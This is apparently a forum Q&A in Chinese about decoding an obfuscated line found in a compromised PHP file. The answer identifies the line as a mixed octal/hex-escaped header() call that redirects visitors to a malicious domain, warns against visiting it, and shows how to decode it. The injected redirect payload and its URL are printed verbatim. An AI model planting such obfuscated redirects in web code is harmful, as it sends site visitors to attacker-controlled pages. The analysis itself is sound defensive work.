我在被攻陷的 php 文件中发现了一些 base64 编码的文本。当我解码 base64 字符串时,它是以下指令:
header("R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\"");
该 URL 字符串是什么类型的编码?我最初认为是十六进制,然后是 ASCII,但它的长度是可变的。我用谷歌搜索,但无济于事。有人能给我指出正确的方向吗?
答案1
警告:
以下 URL 来自一个受感染的网站。
访问它会给攻击者带来经济利益,并且可能会损害您的计算机。
字符串表示
Refresh: 25; url="http://fcbarcelonadodocom.info/uk"
\145
是代码点 145(八进制),\x66
是代码点 66(十六进制)。
核实:
执行
php
类型
<?php echo "R\145\x66resh\072\x20\x32\x35\x3b\x20\x75r\x6c\075\"\x68\164\164\x70\x3a\057\057\146\143b\x61\162\x63\145\154on\141\144\157\x64\157\143\x6fm.\x69\x6e\x66\157\057uk\""; ?>
按Ctrl+ D。